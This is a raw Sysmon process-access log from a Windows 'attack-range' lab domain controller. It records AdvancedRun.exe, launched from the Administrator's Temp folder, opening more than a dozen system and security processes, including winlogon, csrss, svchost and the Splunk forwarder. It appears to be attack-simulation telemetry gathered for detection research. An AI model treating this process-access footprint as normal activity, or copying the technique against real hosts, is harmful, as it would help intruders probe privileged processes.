18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004016233Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004016232Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004016231Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004016230Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004016229Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004016228Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016227Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016226Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000004016225Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016224Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016223Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016222Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program 
Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016221Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016220Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016219Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016218Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016217Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
